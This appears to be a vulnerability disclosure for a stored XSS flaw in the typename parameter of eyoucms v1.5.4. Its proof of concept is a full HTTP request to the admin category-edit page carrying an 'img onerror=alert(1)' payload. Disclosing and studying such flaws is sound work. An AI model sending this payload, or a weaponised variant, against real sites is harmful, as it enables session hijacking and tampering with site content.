代码拉取完成,页面将自动刷新
eyoucms v1.5.4 typename parameter has a stored XSS vulnerability
POC
Host: www.eyou.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 332
Origin: http://www.eyou.com
Connection: close
Referer: http://www.eyou.com/login.php?m=admin&c=Arctype&a=edit&id=68&lang=cn
Cookie: home_lang=cn; admin_lang=cn; PHPSESSID=kc2ot9hcf8c1685heb8bt7k1n0; users_id=1; workspaceParam=index%7CArctype
Upgrade-Insecure-Requests: 1
X-Forwarded-For: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1```
typename=%3Cimg+src%3D1+onerror%3Dalert%281%29%3E&dirname=imgsrc1onerroralert1¤t_channel=1&parent_id=0&channeltype=1&dirpath=&is_hidden=0&is_part=0&typelink=&englist_name=&litpic_local=&litpic_remote=&templist=lists_article.htm&tempview=view_article.htm&seo_title=&seo_keywords=&seo_description=&tab=1&id=68&grade=0&oldgrade=0
The payload is stored in the database, so it is stored XSS

此处可能存在不合适展示的内容,页面不予展示。您可通过相关编辑功能自查并修改。
如您确认内容无涉及 不当用语 / 纯广告导流 / 暴力 / 低俗色情 / 侵权 / 盗版 / 虚假 / 无价值内容或违法国家有关法律法规的内容,可点击提交进行申诉,我们将尽快为您处理。